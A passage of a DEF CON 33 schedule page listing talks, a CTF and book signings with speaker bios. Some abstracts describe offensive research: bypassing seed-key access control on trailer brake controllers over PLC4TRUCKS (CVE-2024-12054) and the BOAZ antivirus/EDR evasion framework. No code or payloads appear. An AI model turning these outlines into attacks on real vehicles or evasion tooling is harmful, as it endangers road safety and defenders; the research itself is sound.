You all know that PLC4TRUCKS is unintentionally accessible wirelessly (CVEs 2020-14514 and 2022-26131). In this talk we will dig into the details of the new CVE-2024-12054 and some other results on the ECU investigated. This talk is tailored to those with an automotive cybersecurity background. We found ECUs running the KWP2000 diagnostic protocol on PLC4TRUCKS, supposedly secured with their fancy seed-key exchange. But guess what? Those seeds are way more predictable than they should be. A bit of timing trickery, a classic reset attack, and boom – we're in, no peeking at the ECU's responses needed. Blind, non-contact attacks on PLC4TRUCKS? Yep, we found a way. Turns out wireless unauthorized diagnostics access isn't just limited to older equipment. These newer trailer brake controllers' diagnostic functions can be abused too. This situation highlights the need for future tractors to deploy mitigations that protect the trailer from wireless attacks because they are all reachable and even the new ones are vulnerable.

SpeakerBio:  Ben Gardiner

Ben is a Senior Cybersecurity Research Engineer at the National Motor Freight Traffic Association, Inc. (NMFTA)™ specializing in hardware and low-level software security. He has held security assurance and reversing roles at a global corporation, as well as worked in embedded software and systems engineering roles at several organizations.

Ben has conducted workshops and presentations at numerous cybersecurity events globally, including the CyberTruck Challenge, GENIVI security sessions, Hack in Paris, HackFest, escar USA and DEF CON.

Ben holds a M.Sc. Eng. in Applied Math & Stats from Queen’s University. In addition to speaking on the main stage at DEF CON, Ben is a volunteer at the DEF CON Hardware Hacking Village (DC HHV) and Car Hacking Village (CHV). He is GIAC GPEN and GICSP certified, chair of the SAE TEVEES18A1 Cybersecurity Assurance Testing TF (published J3322), a contributor to several American Trucking Associations (ATA) Technology & Maintenance Council (TMC) task forces, ISO WG11 committees, and a voting member of the SAE Vehicle Electronic Systems Security Committee.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 17:00-17:45 PDT


Title: Blind Trailer Shouting
When: Saturday, Aug 9, 17:00 - 17:45 PDT
Where: LVCCWest-Level1-Hall3-Track 1 - Map

Description:

Tanker trailers? Turns out those aren't just big, dumb hunks of metal. They have a powerline network, PLC4TRUCKS, which is unintentionally accessible wirelessly (CVEs 2020-14514 and 2022-26131). We found new trailer brake controllers using diagnostic protocol KWP2000, secured with access control by seed-key (a challenge-response protocol). We'll show how to use Wireshark to analyze the diag. traffic. We'll discuss why randomness is critical for any challenge-response protocol.

We'll cover two ways to bypass this access control: using a SMT solver to crack the routine from a few request-response pairs (automated with AHK), and a classic reset attack that makes seeds entirely predictable. This second way allows for a blind, wireless attack, a finding now recognized as CVE-2024-12054. We'll detail how we ran timing search 'campaigns' with a custom sigrok decoder to PoC it.

The trailer brake controller is also at risk from trailer-installed telematics devices too. We'll show how to use Scapy Automotive's UDS scanner on a faked CAN bus for PLC4TRUCKS (plus modify that for a known seed-key routine) so we can get a picture of that attack surface.

This and the previous CVEs are a result of the heavy vehicle testing we do. We'll share some details of how we do onsite truck tests and how we do bench tests.

SpeakerBio:  Ben Gardiner

Ben is a Senior Cybersecurity Research Engineer at the National Motor Freight Traffic Association, Inc. (NMFTA)™ specializing in hardware and low-level software security. He has held security assurance and reversing roles at a global corporation, as well as worked in embedded software and systems engineering roles at several organizations.

Ben has conducted workshops and presentations at numerous cybersecurity events globally, including the CyberTruck Challenge, GENIVI security sessions, Hack in Paris, HackFest, escar USA and DEF CON.

Ben holds a M.Sc. Eng. in Applied Math & Stats from Queen’s University. In addition to speaking on the main stage at DEF CON, Ben is a volunteer at the DEF CON Hardware Hacking Village (DC HHV) and Car Hacking Village (CHV). He is GIAC GPEN and GICSP certified, chair of the SAE TEVEES18A1 Cybersecurity Assurance Testing TF (published J3322), a contributor to several American Trucking Associations (ATA) Technology & Maintenance Council (TMC) task forces, ISO WG11 committees, and a voting member of the SAE Vehicle Electronic Systems Security Committee.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Saturday - 11:00-16:50 PDT


Title: BloodHound Enterprise CTF
When: Saturday, Aug 9, 11:00 - 16:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Tactics 1 - Map

Description:

Tactic activity that can run for the length of the village each day. CTF activity where attendees can use Bloodhound Enterprise in a simulated environment to gain flags. CTF windows is 20 mins for each registered user

Speakers:Hugo van den Toorn,Joey Dreijer

SpeakerBio:  Hugo van den Toorn

Hugo is former Chief Information Security Officer and has now transitioned back to help other organizations understand adversary tradecraft. With over twelve years of experience in the Information Security industry, he has a solid technical and executive background as hands-on security leader.

Hugo has experience with and a keen interest in Social engineering, phishing and physical penetration testing. Nowadays, Hugo takes pride and joy in helping individual team members and the business grow. With a strong technical foundation, Hugo combines his passion for security, teaching and hacking with a drive for continuous improvement and optimization of people, processes and technology.

SpeakerBio:  Joey Dreijer
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

ADV - Saturday - 14:00-14:30 PDT


Title: Blurred Lines of Cyber Threat Attribution: The Evolving Tactics of North Korean Cyber Threat Actors
When: Saturday, Aug 9, 14:00 - 14:30 PDT
Where: LVCCWest-Level2-W231 - Map

Description:

Attributing cyber threats to a specific nation-state remains one of the most complex challenges in cybersecurity. Cyber attribution relies on analyzing digital artifacts, infrastructure patterns, and adversary tactics, none of which provide definitive proof on their own. Threat actors continuously evolve, adopting new methodologies and obfuscation techniques that make attribution increasingly difficult. Over the past decade, North Korea’s cyber operations have transformed from rudimentary attacks into highly sophisticated campaigns that rival the capabilities of established cyber powers. Initially, DPRK’s cyber program consisted of loosely organized groups with limited technical capacity, but today, these actors operate under a structured, state-controlled framework with clear strategic objectives. This research presents an in-depth analysis of how DPRK threat actors have adapted, restructured, and collaborated, shedding light on the complexities of nation-state attribution.

SpeakerBio:  Seongsu Park, APT Research team, Staff Threat Researcher at Zscaler

Seongsu Park(@unpacker) is a passionate researcher on malware research, threat intelligence, and incident response with over a decade of experience in cybersecurity. He has extensive experience in malware researching, evolving attack vectors researching, and threat intelligence with a heavy focus on response to high-skilled North Korea threat actors.

Now he is working in the Zscaler APT Research team as a Staff Threat Researcher and focuses on analyzing and tracking security threats in the APAC region.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 11:00-11:45 PDT


Title: BOAZ - A Multilayered Approach to AV/EDR Evasion Engineering
When: Friday, Aug 8, 11:00 - 11:45 PDT
Where: LVCCWest-Level2-W209 - Map

Description:

BOAZ (Bypass, Obfuscate, Adapt, Zero-Trust) evasion was inspired by the concept of multi-layered approach which is the evasive version of defence-in-depth first proposed in a presentation at BH USA14. BOAZ was developed to provide greater control over combinations of evasion methods, enabling more granular evaluations against antivirus and EDR. It is designed to bypass before, during, and post execution detections that span signature, heuristic, and behavioural detection mechanisms. BOAZ supports both x86/x64 binary (PE) or raw payload as input and output EXE or DLL. It has been tested on separated Windows 11 Enterprise, Windows 10, and Windows Server 2022 VMs with 14 desktop AVs and 7 EDRs installed including Windows Defender, Norton, BitDefender, Sophos, and ESET. The design of BOAZ evasion is modular, so users can add their own toolset or techniques to the framework. BOAZ is written in C++ and C and uses Python3 as the main linker to integrate all modules. There have been significant improvements implemented since its inception. The new version of the BOAZ evasion tool, set for release at DEF CON 33, will feature three novel threadless process injection primitives, along with newly implemented loaders and behavioural evasion techniques.

SpeakerBio:  Thomas "XM20" Xuan Meng

Thomas is a cybersecurity researcher, reverse engineer, and developer with a diverse background in policing, academia, and civil service. He holds a PhD in Computational Engineering, an MPhil in Criminological Research, and a BSc in Mathematics, and was awarded a university medal in Cybersecurity from Edinburgh Napier University.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 10:00-10:45 PDT


Title: BOAZ - A Multilayered Approach to AV/EDR Evasion Engineering
When: Saturday, Aug 9, 10:00 - 10:45 PDT
Where: LVCCWest-Level2-W211 - Map

Description:

BOAZ (Bypass, Obfuscate, Adapt, Zero-Trust) evasion was inspired by the concept of multi-layered approach which is the evasive version of defence-in-depth first proposed in a presentation at BH USA14. BOAZ was developed to provide greater control over combinations of evasion methods, enabling more granular evaluations against antivirus and EDR. It is designed to bypass before, during, and post execution detections that span signature, heuristic, and behavioural detection mechanisms. BOAZ supports both x86/x64 binary (PE) or raw payload as input and output EXE or DLL. It has been tested on separated Windows 11 Enterprise, Windows 10, and Windows Server 2022 VMs with 14 desktop AVs and 7 EDRs installed including Windows Defender, Norton, BitDefender, Sophos, and ESET. The design of BOAZ evasion is modular, so users can add their own toolset or techniques to the framework. BOAZ is written in C++ and C and uses Python3 as the main linker to integrate all modules. There have been significant improvements implemented since its inception. The new version of the BOAZ evasion tool, set for release at DEF CON 33, will feature three novel threadless process injection primitives, along with newly implemented loaders and behavioural evasion techniques.

SpeakerBio:  Thomas "XM20" Xuan Meng

Thomas is a cybersecurity researcher, reverse engineer, and developer with a diverse background in policing, academia, and civil service. He holds a PhD in Computational Engineering, an MPhil in Criminological Research, and a BSc in Mathematics, and was awarded a university medal in Cybersecurity from Edinburgh Napier University.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Friday - 16:00-16:59 PDT


Title: Book Signing - - Jim O'Gorman/No Starch Press
When: Friday, Aug 8, 16:00 - 16:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 1 - Map

Description:

Return to Index    -    Add to Google    -    ics Calendar file

MISC - Friday - 10:00-10:59 PDT


Title: Book Signing - Adversary Emulation with MITRE ATT&CK - Drinor Selmanaj
When: Friday, Aug 8, 10:00 - 10:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 2 - Map

Description:

Drinor Selmanaj is a cybersecurity pioneer, Forbes Technology Council member, and published author. As Founder of Sentry, he leads an elite team securing unicorn-stage companies and Big Four clients across critical sectors. He also founded the Cyber Academy, where his hands-on training programs and AI-driven edtech solutions have launched thousands of careers and are redefining how cybersecurity talent is developed worldwide.

SpeakerBio:  Drinor Selmanaj

Drinor Selmanaj is a cybersecurity pioneer, Forbes Technology Council member, and published author. As Founder of Sentry, he leads an elite team securing unicorn-stage companies and Big Four clients across critical sectors. He also founded the Cyber Academy, where his hands-on training programs and AI-driven edtech solutions have launched thousands of careers and are redefining how cybersecurity talent is developed worldwide.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Saturday - 10:00-10:59 PDT


Title: Book Signing - Adversary Emulation with MITRE ATT&CK - Drinor Selmanaj
When: Saturday, Aug 9, 10:00 - 10:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 4 - Map

Description:

Drinor Selmanaj is a cybersecurity pioneer, Forbes Technology Council member, and published author. As Founder of Sentry, he leads an elite team securing unicorn-stage companies and Big Four clients across critical sectors. He also founded the Cyber Academy, where his hands-on training programs and AI-driven edtech solutions have launched thousands of careers and are redefining how cybersecurity talent is developed worldwide.

SpeakerBio:  Drinor Selmanaj

Drinor Selmanaj is a cybersecurity pioneer, Forbes Technology Council member, and published author. As Founder of Sentry, he leads an elite team securing unicorn-stage companies and Big Four clients across critical sectors. He also founded the Cyber Academy, where his hands-on training programs and AI-driven edtech solutions have launched thousands of careers and are redefining how cybersecurity talent is developed worldwide.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Friday - 13:00-13:59 PDT


Title: Book Signing - Alex Matrosov/No Starch Press
When: Friday, Aug 8, 13:00 - 13:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 3 - Map

Description:
SpeakerBio:  Alex Matrosov
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

MISC - Friday - 14:00-14:59 PDT


Title: Book Signing - Alfie Champion/No Starch Press
When: Friday, Aug 8, 14:00 - 14:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 3 - Map

Description:
SpeakerBio:  Alfie Champion
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

MISC - Saturday - 16:00-16:59 PDT


Title: Book Signing - Breaking IN: A Practical Guide To Starting a Career In Information Security Cybersecurity Essentials For Startups : A Practical Guide - Ayman Elsawah
When: Saturday, Aug 9, 16:00 - 16:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 2 - Map

Description:
SpeakerBio:  Ayman Elsawah
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

MISC - Friday - 16:00-16:59 PDT


Title: Book Signing - Breaking IN: A Practical Guide To Starting a Career In Information Security Cybersecurity Essentials For Startups : A Practical Guide - Ayman Elsawah
When: Friday, Aug 8, 16:00 - 16:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 4 - Map

Description:
SpeakerBio:  Ayman Elsawah
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

MISC - Saturday - 11:00-11:59 PDT


Title: Book Signing - Casey Edman/No Starch Press
When: Saturday, Aug 9, 11:00 - 11:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 3 - Map

Description:
SpeakerBio:  Casey Edman
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

MISC - Saturday - 11:00-11:59 PDT


Title: Book Signing - Corey Ball/No Starch Press
When: Saturday, Aug 9, 11:00 - 11:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 1 - Map

Description:
SpeakerBio:  Corey Ball

Corey Ball is the founder and CEO of hAPI Labs, where he provides penetration testing services. He is the author of Hacking APIs, founder of APIsec University, and has over fifteen years of experience working in IT and cybersecurity. Corey holds the OSCP, CCISO, CISSP, and several other industry certifications.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Saturday - 10:00-10:59 PDT


Title: Book Signing - Cyber Calendar 2026 - Chris DeCarmen/Squared Away LLC
When: Saturday, Aug 9, 10:00 - 10:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 2 - Map

Description:

As a former enlisted Marine, Human Rights volunteer in Cameroon, Ukrainian Peace Corps member, and Army Officer, I bring a diverse background to my current role as a Network Analyst. My lifelong passion for computers—rooted in the era of dial-up—drove me to create the Cyber Calendar. This project aims to illuminate essential cyber practices and address the complacency creep that often undermines our security.

SpeakerBio:  Chris DeCarmen

As a former enlisted Marine, Human Rights volunteer in Cameroon, Ukrainian Peace Corps member, and Army Officer, I bring a diverse background to my current role as a Network Analyst. My lifelong passion for computers—rooted in the era of dial-up—drove me to create the Cyber Calendar. This project aims to illuminate essential cyber practices and address the complacency creep that often undermines our security.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Friday - 10:00-10:59 PDT


Title: Book Signing - Cyber Calendar 2026 - Chris DeCarmen/Squared Away LLC
When: Friday, Aug 8, 10:00 - 10:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 4 - Map

Description:

As a former enlisted Marine, Human Rights volunteer in Cameroon, Ukrainian Peace Corps member, and Army Officer, I bring a diverse background to my current role as a Network Analyst. My lifelong passion for computers—rooted in the era of dial-up—drove me to create the Cyber Calendar. This project aims to illuminate essential cyber practices and address the complacency creep that often undermines our security.

SpeakerBio:  Chris DeCarmen

As a former enlisted Marine, Human Rights volunteer in Cameroon, Ukrainian Peace Corps member, and Army Officer, I bring a diverse background to my current role as a Network Analyst. My lifelong passion for computers—rooted in the era of dial-up—drove me to create the Cyber Calendar. This project aims to illuminate essential cyber practices and address the complacency creep that often undermines our security.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Saturday - 14:00-14:59 PDT


Title: Book Signing - Cyber Calendar 2026 - Chris DeCarmen/Squared Away LLC
When: Saturday, Aug 9, 14:00 - 14:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 2 - Map

Description:

As a former enlisted Marine, Human Rights volunteer in Cameroon, Ukrainian Peace Corps member, and Army Officer, I bring a diverse background to my current role as a Network Analyst. My lifelong passion for computers—rooted in the era of dial-up—drove me to create the Cyber Calendar. This project aims to illuminate essential cyber practices and address the complacency creep that often undermines our security.

SpeakerBio:  Chris DeCarmen

As a former enlisted Marine, Human Rights volunteer in Cameroon, Ukrainian Peace Corps member, and Army Officer, I bring a diverse background to my current role as a Network Analyst. My lifelong passion for computers—rooted in the era of dial-up—drove me to create the Cyber Calendar. This project aims to illuminate essential cyber practices and address the complacency creep that often undermines our security.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Friday - 15:00-15:59 PDT


Title: Book Signing - Daniel Reilly/No Starch Press
When: Friday, Aug 8, 15:00 - 15:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 3 - Map

Description:
SpeakerBio:  Daniel Reilly
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

MISC - Saturday - 13:00-13:59 PDT


Title: Book Signing - Eugene Lim/ No Starch Press
When: Saturday, Aug 9, 13:00 - 13:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 1 - Map

Description:
SpeakerBio:  Eugene "spaceraccoon" Lim

Eugene Lim is a security researcher and white hat hacker. From Amazon to Zoom, he has helped secure applications from a range of vulnerabilities. His work has been featured at top conferences such as Black Hat, DEF CON, and industry publications like WIRED and The Register.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Friday - 12:00-12:59 PDT


Title: Book Signing - Firewalls Don't Stop Dragons: A Step-by-Step Guide to Computer Security and Privacy for Non-Techies (5th ed) - Carey Parker
When: Friday, Aug 8, 12:00 - 12:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 2 - Map

Description:

Carey Parker is on a mission to raise the awareness of everyday, non-technical people on the crucially important topics of cybersecurity and privacy. There are plenty of resources for computer geeks (like himself), but is striving to reach the 99% of the population who use the Internet all the time but have no real idea how safe they are nor how to make themselves safer. It might seem like a lost cause, but trust him, it’s not! There are dozens of free and simple things we can all be doing to protect ourselves, our family, and our friends.

SpeakerBio:  Carey Parker

Carey Parker is on a mission to raise the awareness of everyday, non-technical people on the crucially important topics of cybersecurity and privacy. There are plenty of resources for computer geeks (like himself), but is striving to reach the 99% of the population who use the Internet all the time but have no real idea how safe they are nor how to make themselves safer. It might seem like a lost cause, but trust him, it’s not! There are dozens of free and simple things we can all be doing to protect ourselves, our family, and our friends.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Saturday - 14:00-14:59 PDT


Title: Book Signing - Fotis Chantizis/ No Starch Press
When: Saturday, Aug 9, 14:00 - 14:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 1 - Map

Description:
SpeakerBio:  Fotis Chantizis
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

MISC - Saturday - 11:00-11:59 PDT


Title: Book Signing - Future of Hacking: The Rise of Cybercrime and the Fight to Keep Us Safe - Laura S. Scherling, EdD / Bloomsbury
When: Saturday, Aug 9, 11:00 - 11:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 4 - Map

Description:

Laura Sang Hee Scherling, EdD, is a director and adjunct lecturer at Columbia University. Scherling is the founder of the Cyber Care Institute and co-founder of Civic Art Lab. Her previous books include Ethics in Design and Communication, Digital Transformation in Design, and Product Design, Technology, and Social Change. She is a contributor to Tech Policy Press and Design Observer. Scherling is passionate about tech ethics, Internet freedom, and cybersecurity awareness.

Accepted Payment Methods: Cash, Venmo, and Paypal

SpeakerBio:  Laura S. Scherling, EdD

Laura Sang Hee Scherling, EdD, is a director and adjunct lecturer at Columbia University. Scherling is the founder of the Cyber Care Institute and co-founder of Civic Art Lab. Her previous books include Ethics in Design and Communication, Digital Transformation in Design, and Product Design, Technology, and Social Change. She is a contributor to Tech Policy Press and Design Observer. Scherling is passionate about tech ethics, Internet freedom, and cybersecurity awareness. Accepted Payment Methods: Cash, Venmo, and Paypal


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Friday - 15:00-15:59 PDT


Title: Book Signing - Future of Hacking: The Rise of Cybercrime and the Fight to Keep Us Safe - Laura S. Scherling, EdD / Bloomsbury
When: Friday, Aug 8, 15:00 - 15:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 2 - Map

Description:

Laura Sang Hee Scherling, EdD, is a director and adjunct lecturer at Columbia University. Scherling is the founder of the Cyber Care Institute and co-founder of Civic Art Lab. Her previous books include Ethics in Design and Communication, Digital Transformation in Design, and Product Design, Technology, and Social Change. She is a contributor to Tech Policy Press and Design Observer. Scherling is passionate about tech ethics, Internet freedom, and cybersecurity awareness.

Accepted Payment Methods: Cash, Venmo, and Paypal

SpeakerBio:  Laura S. Scherling, EdD

Laura Sang Hee Scherling, EdD, is a director and adjunct lecturer at Columbia University. Scherling is the founder of the Cyber Care Institute and co-founder of Civic Art Lab. Her previous books include Ethics in Design and Communication, Digital Transformation in Design, and Product Design, Technology, and Social Change. She is a contributor to Tech Policy Press and Design Observer. Scherling is passionate about tech ethics, Internet freedom, and cybersecurity awareness. Accepted Payment Methods: Cash, Venmo, and Paypal


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Sunday - 10:00-10:59 PDT


Title: Book Signing - Ghost Hacker : How to hack human spirit - Jun Kawasaki
When: Sunday, Aug 10, 10:00 - 10:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 4 - Map

Description:

Jun “Ghost Hacker” Kawasaki is an MD-candidate in Brain Pathology at Niigata University and former Tendai monk who reverse-engineers human being systems by fusing neuroscience, information physics, and ancient rituals. In his DEFCON parts—drawn from his new book Ghost Hacker: How to Hack the Human Spirit—he’ll reveal the playbook for planting and propagating ideas in the human spirit. also secure your spirit and soul.

Payment Method: Credit Card, Paypal

DC 33 Engagements - Car Hacking Village, Biohacking Village, GenSec, AIxCC

SpeakerBio:  Jun “Ghost Hacker” Kawasaki

Jun “Ghost Hacker” Kawasaki is an MD-candidate in Brain Pathology at Niigata University and former Tendai monk who reverse-engineers human being systems by fusing neuroscience, information physics, and ancient rituals. In his DEFCON parts—drawn from his new book Ghost Hacker: How to Hack the Human Spirit—he’ll reveal the playbook for planting and propagating ideas in the human spirit. also secure your spirit and soul.

DC 33 Engagements - Car Hacking Village, Biohacking Village, GenSec, AIxCC


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Saturday - 15:00-15:59 PDT


Title: Book Signing - Jason Andress/ No Starch Press
When: Saturday, Aug 9, 15:00 - 15:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 1 - Map

Description:
SpeakerBio:  Jason Andress
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

MISC - Friday - 11:00-11:59 PDT


Title: Book Signing - Jon DiMaggio/ No Starch Press
When: Friday, Aug 8, 11:00 - 11:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 1 - Map

Description:
SpeakerBio:  Jon DiMaggio

Jon DiMaggio is the Chief Security Strategist at Analyst1 and a cybercrime hunter who doesn’t just follow ransomware gangs, he infiltrates them. A former U.S. intelligence analyst with a background in signals intelligence, Jon has spent his career going deep undercover inside some of the world’s most dangerous cybercrime syndicates. In 2024, he embedded himself within the notorious LockBit ransomware gang, gathering intelligence that helped law enforcement take down one of the most prolific cybercriminal operations in history.

His investigative series The Ransomware Diaries exposed LockBit’s inner workings and earned widespread recognition. Jon is the author of The Art of Cyberwarfare (No Starch Press), a two-time SANS Difference Makers Award winner, has appeared on 60 Minutes, and has been featured in The New York Times, Wired, and Bloomberg. He is also a regular speaker at DEFCON, RSA, and other major security conferences. Whether he’s chasing cybercriminals or telling their stories, Jon brings the kind of firsthand insight you only get when you’ve walked into the lion’s den, and walked out.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Friday - 15:00-15:59 PDT


Title: Book Signing - JP Ausmasson/No Starch Press
When: Friday, Aug 8, 15:00 - 15:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 1 - Map

Description:
SpeakerBio:  JP Ausmasson
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

MISC - Saturday - 15:00-15:59 PDT


Title: Book Signing - Kara Nance/No Starch Press
When: Saturday, Aug 9, 15:00 - 15:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 3 - Map

Description:
SpeakerBio:  Kara Nance
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

MISC - Saturday - 10:00-10:59 PDT


Title: Book Signing - Kyle Cucci/No Starch Press
When: Saturday, Aug 9, 10:00 - 10:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 1 - Map

Description:
SpeakerBio:  Kyle "d4rksystem" Cucci, Staff Security Research Engineer @ Proofpoint

Kyle Cucci is a malware analyst and detection engineer with Proofpoint’s Threat Research team. Previously, he led the forensic investigations and malware research teams at a large global bank. Kyle is the author of the book "Evasive Malware: A Field Guide to Detecting, Analyzing, and Defeating Advanced Threats" and is a regular speaker at conferences, speaking on topics like malware analysis, offensive security, and security engineering. In his free time, Kyle enjoys contributing to the community via open source tooling, research, and blogging.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Saturday - 12:00-12:59 PDT


Title: Book Signing - Micah Lee/ No Starch Press
When: Saturday, Aug 9, 12:00 - 12:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 1 - Map

Description:
SpeakerBio:  Micah "micahflee" Lee

Micah is a member of the Lockdown Systems collective. He's a coder, a security researcher, and an independent journalist. He develops open source privacy and security tools, and he's done a lot of work related to journalism and whistleblowing. He’s the former director of infosec for The Intercept. He wrote a book that teaches people how to analyze hacked and leaked datasets, Hacks, Leaks, and Revelations. He really doesn’t like the technofascist future we’ve all been forced into.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Friday - 13:00-13:59 PDT


Title: Book Signing - Nick Aleks/No Starch Press
When: Friday, Aug 8, 13:00 - 13:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 1 - Map

Description:
SpeakerBio:  Nick Aleks
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

MISC - Saturday - 10:00-10:59 PDT


Title: Book Signing - Patrick Wardle/ No Starch Press
When: Saturday, Aug 9, 10:00 - 10:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 3 - Map

Description:
SpeakerBio:  Patrick Wardle

Patrick Wardle is the founder of the Objective-See Foundation, the CEO/Cofounder of DoubleYou, and the author of "The Art of Mac Malware" book series. Having worked at NASA and the NSA, as well as presenting at countless security conferences, he is intimately familiar with aliens, spies, and talking nerdy. Passionate about macOS security, Patrick spends his days discovering Apple 0days, studying macOS malware, and releasing free open-source security tools to protect Mac users.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Saturday - 14:00-14:59 PDT


Title: Book Signing - Paulino Calderon/No Starch Press
When: Saturday, Aug 9, 14:00 - 14:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 3 - Map

Description:
SpeakerBio:  Paulino Calderon
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

MISC - Friday - 14:00-14:59 PDT


Title: Book Signing - Philip Dunsey/No Starch Press
When: Friday, Aug 8, 14:00 - 14:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 1 - Map

Description:
SpeakerBio:  Philip Dunsey
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

MISC - Saturday - 12:00-12:59 PDT


Title: Book Signing - Practical Lock Picking; Keys to the Kingdom - Deviant Ollam/Red Team Tools
When: Saturday, Aug 9, 12:00 - 12:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 2 - Map

Description:

While paying the bills as a physical penetration specialist with The CORE Group and the Director of Education for Red Team Alliance, Deviant Ollam also sat on the Board of Directors of the US division of TOOOL -- The Open Organisation Of Lockpickers -- for 14 years... acting as the the nonprofit's longest-serving Boardmember. His books Practical Lock Picking and Keys to the Kingdom are among Syngress Publishing's best-selling pen testing titles. In addition to being a lockpicker, Deviant is also a SAVTA certified Professional Safe Technician, a GSA certified Safe and Vault Inspector, member of the International Association of Investigative Locksmiths, a Life Safety and ADA consultant, and an NFPA Fire Door Inspector. At multiple annual security conferences Deviant started Lockpick Village workshop areas, and he has conducted physical security training sessions for Black Hat, the SANS Institute, DeepSec, ToorCon, HackCon, ShakaCon, HackInTheBox, ekoparty, AusCERT, GovCERT, CONFidence, the FBI, the NSA, DARPA, the National Defense University, Los Alamos National Lab, the United States Naval Academy at Annapolis, and the United States Military Academy at West Point.

In his limited spare time, Deviant enjoys loud moments with lead acceleration and quiet times with podcasts. He arrives at airports too early and shows up at parties too late, but will promptly appear right on time for tacos or whiskey.

SpeakerBio:  Deviant Ollam, Director of Education at Red Team Alliance

While paying the bills as a physical penetration specialist with The CORE Group and the Director of Education for Red Team Alliance, Deviant Ollam also sat on the Board of Directors of the US division of TOOOL -- The Open Organisation Of Lockpickers -- for 14 years... acting as the the nonprofit's longest-serving Boardmember. His books Practical Lock Picking and Keys to the Kingdom are among Syngress Publishing's best-selling pen testing titles. In addition to being a lockpicker, Deviant is also a SAVTA certified Professional Safe Technician, a GSA certified Safe and Vault Inspector, member of the International Association of Investigative Locksmiths, a Life Safety and ADA consultant, and an NFPA Fire Door Inspector. At multiple annual security conferences Deviant started Lockpick Village workshop areas, and he has conducted physical security training sessions for Black Hat, the SANS Institute, DeepSec, ToorCon, HackCon, ShakaCon, HackInTheBox, ekoparty, AusCERT, GovCERT, CONFidence, the FBI, the NSA, DARPA, the National Defense University, Los Alamos National Lab, the United States Naval Academy at Annapolis, and the United States Military Academy at West Point.

In his limited spare time, Deviant enjoys loud moments with lead acceleration and quiet times with podcasts. He arrives at airports too early and shows up at parties too late, but will promptly appear right on time for tacos or whiskey.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Friday - 11:00-11:59 PDT


Title: Book Signing - Supply Chain Software Security-AI, IoT and Application Security - Aamiruddin Syed/Apres Media LLC
When: Friday, Aug 8, 11:00 - 11:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 3 - Map

Description:

